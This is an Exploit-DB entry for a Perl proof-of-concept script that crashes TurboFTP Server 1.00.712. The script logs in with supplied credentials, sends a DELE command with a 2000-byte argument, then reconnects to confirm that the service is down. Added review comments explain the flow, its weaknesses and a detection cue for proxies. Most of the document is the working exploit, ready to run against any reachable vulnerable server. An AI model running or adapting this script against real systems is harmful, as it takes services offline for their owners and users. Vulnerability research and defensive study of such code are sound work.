TurboFTP Server 1.00.712 – Remote Denial of Service

  • 作者: corelanc0d3r
    日期: 2010-01-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11131/
  • # Exploit Title : TurboFTP Server 1.00.712 Remote DoS
    # Date: 30 december 2009
    # Author: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
    # Bug found by: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
    # Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
    # Version : 1.00.712
    # Issue fixed in: 1.00.720
    # OS: Windows
    # Tested on : XP SP3 En (VirtualBox)
    # Type of vuln: DoS
    # Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
    #
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    #
    #
    # Code :
    # Banner: the author's ASCII-art logo and the tool title, written to STDOUT
    # in one call before any argument parsing or network activity happens.
    print(
        "|------------------------------------------------------------------|\n",
        "| __ __ |\n",
        "| _________________/ /___ _____ / /________ _____ ___|\n",
        "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n",
        "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n",
        "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n",
        "||\n",
        "| http://www.corelan.be:8800 |\n",
        "||\n",
        "|-------------------------------------------------[ EIP Hunters ]--|\n\n",
        "[+] DoS exploit for TurboFTP Server 1.00.712 \n",
    );
    
    use IO::Socket; 
    
    # Exactly four positional arguments are expected: target IP, target port,
    # FTP user and FTP password. Anything else prints the usage line and stops.
    # Note that the exit status is 0 even though this is an error path.
    if (@ARGV != 4) {
        print "\nusage: $0 <targetip> <targetport> <user> <password>\n";
        exit(0);
    }
    
    # Main flow. Per the header above, this is a proof of concept for a remote
    # denial of service in TurboFTP Server 1.00.712 (fixed in 1.00.720): it logs
    # in with the supplied account, sends one DELE command with a 2000-byte
    # argument, then opens a second connection to see whether the server still
    # greets clients.
    # NOTE(review): $sock, $ftp and $sock2 are assigned without `my`, so they
    # are package globals; nothing visible here enables strict or warnings.
    my $user=$ARGV[2];
    my $pass=$ARGV[3];
    
    print " [+] Preparing DoS payload\n";
    # The DELE argument: 2000 repetitions of the byte "A". It is far longer
    # than any ordinary file path, so a proxy or sensor that caps the length of
    # an FTP command line can flag or drop this request.
    my $payload = "A" x 2000;
    print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
    # The constructor's result is not checked here; a failed connect leaves
    # $sock undefined and is only reported by the `|| die` on the first read.
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
    PeerPort => $ARGV[1], 
    Proto=> 'tcp'); 
    
    # Two lines are read before login - presumably the server's greeting spans
    # two lines (TODO confirm); a one-line greeting would leave the second read
    # waiting for data.
    $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
    print " ** $ftp";
    $ftp = <$sock>;
    print " ** $ftp";
    print " [+] Logging in (user $user)\n";
    # Replies to USER and PASS are echoed but never inspected, so a rejected
    # login is not detected and the DELE below is sent regardless.
    # NOTE(review): credentials are mandatory arguments, which suggests the
    # crash is only reachable after authentication - confirm against the
    # vendor's notes for the 1.00.720 fix.
    print $sock "USER $user\r\n"; 
    $ftp = <$sock>;
    print " ** $ftp";
    print $sock "PASS $pass\r\n"; 
    $ftp = <$sock>;
    print " ** $ftp";
    print " [+] Sending payload\n";
    # The trigger: a single DELE whose path argument is the 2000-byte string.
    print $sock "DELE ".$payload."\r\n";
    # One reply line is read; if the connection was dropped the read yields
    # undef and only the " ** " prefix is printed.
    $ftp = <$sock>;
    print " ** $ftp";
    print " [+] Payload sent, now checking FTP server state\n";
    # Liveness check: a fresh connection is opened and one greeting line is
    # read. Any failure to read it ends the script via die with the "DoS
    # successful" message (so "success" exits non-zero); otherwise the greeting
    # is printed as evidence that the server survived.
    # NOTE(review): the check cannot tell a crashed service from any other
    # reason for a missing greeting (filtering, connection limits), so a
    # "successful" result is only an indication.
    $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
    PeerPort => $ARGV[1], 
    Proto=> 'tcp'); 
    my $ftp2 = <$sock2> || die " [+] DoS successful\n";
    print " [!] DoS did not seem to work\n";
    print " ** $ftp2\n";